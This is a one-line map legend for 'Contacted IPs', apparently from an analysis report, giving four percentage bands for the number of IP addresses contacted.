[Contacted IPs map legend: No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs]